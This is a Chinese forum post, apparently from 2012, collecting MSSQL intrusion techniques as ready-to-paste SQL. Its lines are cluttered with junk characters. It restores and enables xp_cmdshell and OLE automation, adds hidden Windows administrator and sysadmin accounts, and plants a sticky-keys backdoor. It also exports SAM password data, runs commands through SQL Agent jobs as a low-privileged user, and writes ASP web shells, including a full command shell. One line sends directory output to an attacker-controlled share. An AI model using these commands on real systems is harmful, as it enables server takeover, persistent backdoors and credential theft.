1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
5 `& s1 I6 ]2 k. K3 X- ~恢复方法:查询分离器连接后,
& Y, ~% `" E2 e" b7 \第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
% ^# N _" I% b) L# e/ M J第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' ) V7 e/ @8 i9 w: q
然后按F5键命令执行完毕$ s- K% _2 z, R3 U Y( k
5 |; p6 D# e& c" C2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)% D1 ]9 x- O y# z" Q2 h& k
恢复方法:查询分离器连接后,
% ^2 [/ \$ @& m; k, _ s# n第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
, W3 ]( I9 \+ l# O1 ]& ~第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: D a- z9 V3 ?, l/ ?然后按F5键命令执行完毕' X5 H* c5 b3 H. x8 x
2 j* q' ` c$ T! S
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): ^8 `6 z! }4 a" q& I6 R: s
恢复方法:查询分离器连接后,
1 q8 H5 A0 _% Y2 y" R第一步执行:exec sp_dropextendedproc 'xp_cmdshell'3 l$ E( |' V1 d* ^
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
8 d9 P3 c1 V0 N然后按F5键命令执行完毕
1 Q6 b1 p: S6 o, u. Q) l1 d4 _* d/ c- _% m- j1 e
4 终极方法.
* |+ m# w- x3 o8 l; G如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 Q, c) |$ C0 L- F% f, d- V- S
查询分离器连接后,
6 p# X p8 e5 N* [2000servser系统:' q3 `; a9 j6 q* E. _( K* H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
! r6 v: a: k" l4 C3 ^% U2 o5 ]/ l9 e. k) c. b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
5 Y) L! [1 D. {* I/ [4 N/ v, T \4 A- [. e3 v" Q7 r! G
xp或2003server系统:1 L+ c+ a7 x) o0 `
) N0 [5 x, e H; D1 [! ]2 ]2 `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'2 i$ H0 k1 i( ~) w m
; ~( ~; R' e8 x4 _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
( J6 u3 y# |4 c1 |3 u4 ]; k+ X+ u- ], d# |2 }$ ? ~
U/ u! h% i* e- { i+ `/ D五个SHIFT
% o4 a4 F+ U- r3 Sdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
5 P/ z- I* h: s9 [
0 n! I6 @ q$ L9 y; Ddeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
& `, `# ]* r2 P" u' V5 B0 P' H) _, @
xp_cmdshell执行命令另一种方法
4 s9 i$ ^* ]# ?4 C+ S* M- b$ edeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' 6 b( T: X Y7 `1 P
7 W, }' j" O- Z5 |; l) ~4 C+ ^# c判断存储扩展是否存在 c5 h4 g+ Q; @. g( f' X# i" ^. W. {
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'- }! t5 r% h/ t& {1 V
返回结果为1就OK) N/ `) `9 c+ v. {/ h: c2 M
$ i1 }* E( b) ?: R
! @3 q) k( u) s: v; E9 M2 S上传xplog70.dll恢复xp_cmdshell语句:
, B5 |& ~. I3 fsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
+ z" P3 o0 u s% `' `) j7 y8 ?: P: S. A* i! c
否则上传xplog7.0.dll
" Y" l+ ]7 o7 E* `( EExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
* M( @7 u) K# Q, g8 e6 y+ S6 }. v# S9 A; g+ w$ Q1 u
- `% T$ C) Y4 D5 T& j, {! n# e$ s3 I
- `2 n+ _$ w' m& B' O( L首先开启沙盘模式:5 a) Q. b2 n9 M* k) g; O
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
3 \# v8 F: B0 |9 F& c( ~% F# t+ K" T# _- f6 t6 m0 U
然后利用jet.oledb执行系统命令
6 Q; i4 P' c; a" T# p1 |5 ?select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
9 q& V6 M6 M* s, `返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
- Z$ m8 e' \# ~ T; R a0 c. w6 p7 o) R8 s
7 \8 S+ `: k; g+ T: p; ^2 z& d7 N
: H. j6 |- {) c
恢复过程sp_addextendedproc 如下:
T; z6 }3 v7 U2 J: Vcreate procedure sp_addextendedproc --- 1996/08/30 20:13 0 V6 Q/ o. ` v/ m7 g+ \/ J
@functname nvarchar(517),/* (owner.)name of function to call */ * k$ _; X3 p! }- M% F
@dllname varchar(255)/* name of DLL containing function */ D$ H+ T' {; @1 ^7 F2 G
as
3 h" L. `; q: _1 hset implicit_transactions off
3 x3 \2 B1 _# Yif @@trancount > 0
4 y- g- ]5 z3 m4 sbegin 9 {/ C! G6 h5 E* o
raiserror(15002,-1,-1,'sp_addextendedproc')
. t0 }! U7 p. X8 @( K* R8 O: @return (1) 6 `6 l; U8 T/ S. F
end
/ K+ q- M V; t" J, z$ c6 zdbcc addextendedproc( @functname, @dllname)
4 z& I5 A5 J/ ^7 U3 z E# y/ U) ireturn (0) -- sp_addextendedproc
% D0 v2 v) \% Y3 _" w" RGO
% o4 o2 z3 V' ^9 } F$ g
+ Z9 L2 G/ |3 t" i. O# \% k! P8 Q9 y5 H, Q
4 ^$ Q, K* _2 R& ^, F+ Y. h# E
导出管理员密码文件9 W9 [7 w) _( ^) q
sa默认可以读sam键.应该。
) B& H _0 M6 {reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
$ L" S& z4 u' Unet user administrator test$ S ~+ h; R7 W# }
用administrator登陆.
& ^# j; x+ {; Q! s$ C' J用完机器后
. C& H. X7 g Dreg import c:\test.reg
' |; R+ I0 _: Z% M根本不用克隆.
, y/ Z4 w8 i. f2 k6 k, H% I' Q找到对应的sid.
: |$ l% f/ J( e: ]+ k! G
# B7 m7 @5 [( m. b( J3 E* N2 ~7 e. t6 G2 q# y* L0 Q e& s
- {! I L' S' d. c3 }9 k恢复所有存储过程; I" U, h6 v2 {- d+ l k# F) c
use master
! y3 n! K2 P3 G" l8 Mexec sp_addextendedproc xp_enumgroups,'xplog70.dll' + L% q" m' C5 `
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
) M! h7 t3 Y+ g. dexec sp_addextendedproc xp_loginconfig,'xplog70.dll' , ~) l% Z- z2 W3 C; @# L) y+ p
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' : w5 {5 J0 b" Q
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
/ y8 q6 Z- y4 w; b/ e: F0 Jexec sp_addextendedproc sp_OACreate,'odsole70.dll'
6 r' |) f# I' W" Z* C* ?' _exec sp_addextendedproc sp_OADestroy,'odsole70.dll' 0 x' c2 l* X5 {) O/ S+ G
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' $ t, S% U# X% b, u0 \
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
0 i3 [) ?2 g" {4 Y: Fexec sp_addextendedproc sp_OAMethod,'odsole70.dll' 1 _3 d1 J, K% ~% k) a0 R7 U
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' " T2 i) f2 }7 g3 o9 _- a/ T- G
exec sp_addextendedproc sp_OAStop,'odsole70.dll' # \; l& Q) H2 q+ s2 m* j
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
+ U, W! c$ h1 i- D+ {exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
; L. W B* F* E# [+ g- E5 Y/ O( Aexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
5 F" p5 i* {+ g3 u2 O% uexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' $ L0 V" L, v) x- ~9 A& N( |
exec sp_addextendedproc xp_regread,'xpstar.dll'
9 P; Y$ E5 O( p6 q; s6 Aexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' - r( H( Y/ o3 ]$ @. i9 C- R
exec sp_addextendedproc xp_regwrite,'xpstar.dll' , g2 O8 w& o" ?: @% D+ l% E0 ^# N
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'1 v0 Y6 Q& k' F) q
$ y- f, y/ d- k- L& c
/ z2 l( n Y9 G# M$ I m3 C建立读文件的存储过程2 _6 V/ M$ I$ S# o
Create proc sp_readTextFile @filename sysname
1 d( F X- y9 ]as$ `- g5 H" U$ `4 K
& }5 q5 u, a. y, M* z( ^
begin
& i" }9 `$ c" b% c: Q) d set nocount on
5 L @/ q8 V6 t$ L Create table #tempfile (line varchar(8000))
\* E+ O. k( }" {# G. U8 c# d exec ('bulk insert #tempfile from "' + @filename + '"')+ H. c+ \/ B. s4 h* f
select * from #tempfile
$ |2 m4 b8 i0 o a U4 Y+ w drop table #tempfile; |$ g" Z# x' b' J9 T& u
End+ ?6 g3 [, X0 t4 a- \
y. W' F0 b0 k1 ?0 O4 B* bexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件, k5 u \% e! g3 {* I) P& |* A
查看登录用户0 J" _) v; }! j4 t" A
Select * from sysxlogins; H6 G/ b3 {- b: C* ~. j8 `
1 x& V# B; X! w' i6 G9 i
把文件内容读取到表中( W) l! x+ y% `: O3 D$ S3 L
BULK INSERT tmp from "c:\test.txt"
0 r* d F1 b! ZdElete from 表名 清理表里的内容/ X% `# H& o, K! K* |5 U
create table b_test(fn nvarchar(4000));建一个表,字段为fn
! S5 L( U5 Z& Z+ {/ g7 r5 N/ Q# j0 \# p: j0 t: j
1 O: z0 c5 A; ]3 i5 p* A( i& x: p: Q加sa用户
: S% S- a6 ]2 t) U G7 K5 a; Uexec master.dbo.sp_addlogin user,pass;
: K) ^0 U, m3 I+ N) \! W. Mexec master.dbo.sp_addsrvrolemember user,sysadmin) l j# O M! s& W
4 l6 p+ r0 ^( W* G
3 b# b% G" J, X6 W% i9 R
( Z/ V- N; u4 N读文件代码9 n' J( x7 K k/ ]) a
declare @o int, @f int, @t int, @ret int
% k" P- e! P) Jdeclare @line varchar(8000)# u; }' O' z, E* w- i- d
exec sp_oacreate 'scripting.filesystemobject', @o out
8 Q, p* g4 q% ]! J/ a) f% ^. ^exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1$ i" Y" _4 j" I2 {
exec @ret = sp_oamethod @f, 'readline', @line out/ W* C8 a7 ]9 i0 H' N# T3 x8 ~3 ~6 Z) U
while( @ret = 0 )0 k8 S! w6 N( i r C0 T3 H3 i
begin
5 n& H+ n% M6 Y& n2 m% d$ oprint @line' x) t- f7 `8 s
exec @ret = sp_oamethod @f, 'readline', @line out
\7 n# {6 ? yend
, `) |: V4 b% P {0 b9 a
# Z5 I" p$ }- r- a5 ?' c* m [
: W2 k0 h. }9 p( e+ t3 @( C1 [写文件代码:" J* P- g5 }2 e- F" z$ q
declare @o int, @f int, @t int, @ret int
! ^! h% C6 }! l9 z7 fexec sp_oacreate 'scripting.filesystemobject', @o out# Z* i2 U4 G }$ a% @
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
( p& V- `$ _) V) _' Zexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》& @ w( B( E( R- _' M: d
& L4 o) P. o2 a# E& c1 y" ?7 S* d. S# a: V l* i
添加lake2 shell/ ?% R1 S" i6 ] {; f) z) g
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'% f& c4 v1 A7 r
sp_dropextendedproc xp_lake2
8 R3 H" V! F7 t; t, t4 D6 wEXEC xp_lake2 'net user'
( ?% {" b0 B1 S1 v3 l+ e+ G$ K
# z* u9 Q* K r/ r* S+ A/ f! D
/ Q; T" h% S! K6 `2 U) R% Y得到硬盘文件信息
, W# E+ d6 Q' `2 J1 f; ?# ^# f% L--参数说明:目录名,目录深度,是否显示文件 + \! t6 d# x. c3 k
execute master..xp_dirtree 'c:' 9 E- s# l. V: r% \; @8 \
execute master..xp_dirtree 'c:',1
( w0 ^% D! G) B2 \execute master..xp_dirtree 'c:',1,1 6 p2 D; z6 ^$ C
3 [- A5 Y& _9 \% x0 z
+ R( n @ K/ L& F$ W6 z1 h L1 i+ E- r
读serv-u配置信息
& }& j! f; U- W" ? Qexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'8 L) u2 _7 I1 F- D) e$ R
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'9 n) P* Y4 @5 r! C1 R
+ {( W* X( E: ~4 v+ T. J
通过xp_regwrite写SHIFT后门' u( N2 }. M. Z9 C4 ^6 g
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
7 j6 p2 M: I: N" i# N& ~: I
1 h# I; d. P+ t. A6 _* O) z( [! v, h* c
3 Y0 f/ }( d1 N R7 R
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';* P$ q1 {% U( m5 ?: A4 I
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
7 e8 O5 |7 w$ u$ |, O6 ~+ y9 w% `7 a: e
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
( N% Q$ K) e3 i
" d7 e' X& H# z/ ]( B
; m3 c# \9 s$ r# u; p/ d# q
; ?+ v- q! C# y- nsql server 2005下开启xp_cmdshell的办法# H4 ]: f. q' b5 x
8 F, L3 d7 ]% D# D4 X, C# L
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;0 Y2 v5 t2 O8 h! n
M7 W8 K& ^& K" Y* ?: ~2 q7 x6 B( ?SQL2005开启'OPENROWSET'支持的方法:
* A" r! _* f2 D! x/ |; J! k$ F' r' H0 H: Z6 e
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;5 v7 v9 {& l9 M$ C! w8 ]# c
* X* b% Q' g% R. D5 {/ w2 w: wSQL2005开启'sp_oacreate'支持的方法:* I, o% y( S! ^: `3 z; q$ G
v, U1 k2 T* N! P5 @exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
% ^; G G& |6 T) L
. `: j9 S- h+ [: O3 f" |' Y* J$ t, k/ c
# i5 B0 G$ ^% w3 ?) H5 u$ m9 \- \; {- @- W. T4 L( U
$ `- p4 c- G* w8 x1 n/ Z
2 p, r5 D/ ]/ h& B. s# i, o. g' y+ C& s
2 J5 a# @4 n7 M4 ~1 s
* {! |0 s+ C, C" E7 i
+ S1 N* ^7 b5 |1 G9 h6 m+ x5 }6 U1 r$ S
/ t( {$ ?4 C2 G6 u, A. z
" Q6 {2 n* b2 J/ Z1 a8 k+ I" H* b1 i7 O
7 U+ Y( v3 L) g( z5 j
* W$ \2 p9 ]$ j8 j! ~+ v2 T) r- n" t6 p" e e: O
% v# ~- I8 b: n4 w2 k+ N- B$ A+ ?% _% v5 R: B) t0 d9 e/ c
: Q- a$ F. C, a
9 i8 e8 H$ g. u8 v; @
! f2 [5 ^8 H- A& N
' {2 N2 Z8 T1 x
/ c3 k, y. t/ b: J% o
/ m L6 L, D; y( f6 k以下方面不知道能不能成功暂且留下研究哈:
8 X0 ?7 A+ M& P' S# g& f! h6 j4)
! k" o3 e& H) _' r$ U3 \9 B5 nuse msdb; --这儿不要是master哟: V+ Y6 {% ~ L! g% Q3 X N# d% o
exec sp_add_job @job_name= czy82 ;
3 ], T, F: H9 W1 A. X; aexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;' z* }. H l- U7 V& g, P* ^$ }
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
( D- L4 ?) l" T$ D" Q. u- mexec sp_start_job @job_name= czy82 ;% {% w# c0 z/ n8 ^3 T( v, h
4 ~" |# h6 P9 o" O7 T4 [& m& c利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
- z' f2 e( I/ {) @- o2 D' \* g执行tsql语句了.
; N8 }$ V+ y: ~2 ~对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名. X: Y2 G; y U5 A# |
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)# ~* i/ ?$ Z% Z3 V, M3 s. u2 I3 O" k
net start SQLSERVERAGENT: }/ C, Y+ H8 Q* A. S* \, @ U
9 Z$ V8 x) p. p) X+ H4 s8 u
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
7 t; {4 v9 K& C7 Q! ~# s5 sUSE msdb: y* ~7 K6 {4 k8 K
EXEC sp_add_job @job_name = GetSystemOnSQL ,
3 g/ E. U9 a/ r7 B& t- ]; n- g@enabled = 1,6 ?3 a/ y" B$ O( P( k- `# N: l
@description = This will give a low privileged user access to& Z5 D$ u% n8 Q
xp_cmdshell ,, b, m! J% f: m( n7 f } R
@delete_level = 1
6 x7 q* @5 l2 Y- e4 nEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,2 m4 P0 t2 E$ M/ G$ W4 R3 s( O
@step_name = Exec my sql ,
* ]; p( F4 ]9 L9 [@subsystem = TSQL ,
0 j# N- A- n' j) _: I& J@command = exec master..xp_execresultset N select exec0 v4 l, ~; Q" h: ?: ~4 z4 D
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
D6 l, J& f: X. HEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,/ v! m. }! S1 s) D5 E$ m, S
@server_name = 你的SQL的服务器名
: x! y+ q. k" g* a& l, P! G% L: DEXEC sp_start_job @job_name = GetSystemOnSQL
4 e/ f& e% w$ H; e
7 e$ b9 z% I/ v8 M, e& |5 |% j不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以" [6 R9 g, a9 v! N. O; _1 T
才让我们可以以public执行xp_cmdshell
7 S4 S* }: V# `+ ]; B
# U% ~# `( d! q) t( p5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
& h m1 @. i/ Y0 L4 j) h' a在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
8 k+ }3 O9 }; A Q2 f! \( ^. T; L/ O2 g6 T8 _( q
USE msdb$ K" D4 M. L: k
EXEC sp_add_job @job_name = ArbitraryFilecreate ,/ \2 `3 V: R/ ?) E, E/ I6 r
@enabled = 1,
, i- R; m' o; p7 c* D. q! k@description = This will create a file called c:\sqlafc123.txt ,
8 A% g# M/ Y3 y8 M& s* \@delete_level = 18 q( i9 s- y6 ~3 a) `. W: ]
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
% c6 V9 @* e$ o" l# ~@step_name = SQLAFC ,. B2 j4 @" b; `" O* I
@subsystem = TSQL ,
! K6 X6 D, Z; H8 y@command = select hello, this file was created by the SQL Agent. ,) r0 ~5 ~1 A( @0 c( e1 f* ^
@output_file_name = c:\sqlafc123.txt + O/ V+ P6 A5 A( M7 r+ t6 }2 Z
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,7 x% {$ q n4 j% k
@server_name = SERVER_NAME
+ k/ [9 A8 x( Y2 n; dEXEC sp_start_job @job_name = ArbitraryFilecreate
7 n3 e1 A+ r! [. n2 B2 K: c0 H
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
" D9 d- k) }2 v d+ u0 o, `$ x$ @/ X _+ h0 t2 P, u7 ]. d/ h8 o
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
4 S8 T& }8 m% U3 Y----------------------------------------------/ l: _# m& T E0 F" L) n
hello, this file was created by the SQL Agent.& H0 B' |1 l, D5 O p
r8 h/ Q ^& {9 b" }+ d! C, U
(1 ?????)
, {: Y1 b w$ S- n+ w& x1 @$ U) I+ O. h5 J4 J* Z8 o& O5 l
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
8 G6 N6 l' ]( L" h& a, `) M" m命令的vbs文件到启动目录!/ s1 y! x9 |. J$ g
) s4 O3 n7 i! k K, Z( [
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)6 s) G8 a/ Q" S r7 E" t& |4 } p
关于sp_MScopyscriptfile 看下面的例子1 `8 x! C5 k2 L8 d
declare @command varchar(100)
2 V s6 h- i0 G+ v, e2 Fdeclare @scripfile varchar(200) / I8 [, b8 y. _9 [
set concat_null_yields_null off / U! c# J, D5 S" k) x$ F$ c
select @command= dir c:\ > "\\attackerip\share\dir.txt"
! |1 Y! b ]7 R2 R7 ?( W, xselect @scripfile= c:\autoexec.bat > nul" | @command | rd " % G5 p1 e; C4 d( c* ^. Z( P
exec sp_MScopyscriptfile @scripfile ,
2 F5 c, I/ U( C+ |7 i
/ y: l7 x' x# w, W这两个东东都还在测试试哟
# W- p' h) L& Z+ i6 p$ \& r6 B让MSSQL的public用户得到一个本机的web shell
# l% N* q6 m9 {+ d3 X1 a# u4 q7 ?) K( O$ F6 O% s) q- Z9 a
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312, H- o- ]8 D+ [7 w: J b3 ?5 Z3 H6 F
--@query= select <img src=vbscript:msgbox(now())> 1 u$ M+ R9 A/ {; J, ?
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> 9 ~9 w" r2 ^+ @3 d8 l8 R8 H e* i
@query= select
2 P( T$ b6 b; `/ x _+ y<%On Error Resume Next 8 s4 u/ s9 I0 l- B6 e% C. R1 R
Set oscript = Server.createObject("wscript.SHELL")
" }7 I2 U2 A1 R) Y5 U' rSet oscriptNet = Server.createObject("wscript.NETWORK") 8 r. A9 w# u8 X, m
Set oFileSys = Server.createObject("scripting.FileSystemObject")
; ~% C" i2 m2 v" P$ CszCMD = Request.Form(".CMD")
2 e6 q% F' [. g8 }- Q8 YIf (szCMD <>"")Then
7 D7 ]; x1 |- k3 vszTempFile = "C:\" & oFileSys.GetTempName() 3 c( T7 C+ O3 G* a
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) # o& x0 B* R8 @7 W/ N+ D: _) c
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) ( H, W! ~5 E4 r
End If %>
6 ^( ^$ q7 {" f N3 Q" Y# x<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
2 v6 Z. f2 `) Q5 D. [# G<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
2 E* A3 ?9 ^$ w; e1 d' n2 L0 ]</FORM><RE>
" A" H8 _. D# x" V9 a! `. a<% If (IsObject(oFile))Then ) G+ \) d( |1 v6 ^" k5 o5 c
On Error Resume Next $ H) U+ }. Y, S6 Q% p
Response.Write Server.HTMLEncode(oFile.ReadAll)
% n5 K2 Z* h2 YoFile.Close 7 w: u* l; ?; p+ }' {
Call oFileSys.deleteFile(szTempFile, True)
6 o9 o Q, }2 W" S' L" w# Y# eEnd If%>
( Y$ B4 V0 ~, n7 D. I</BODY></HTML>
6 u( c; `: i4 V% S. ?* h' V! F |
发表于 2012-9-15 14:37:30
收藏
支持
反对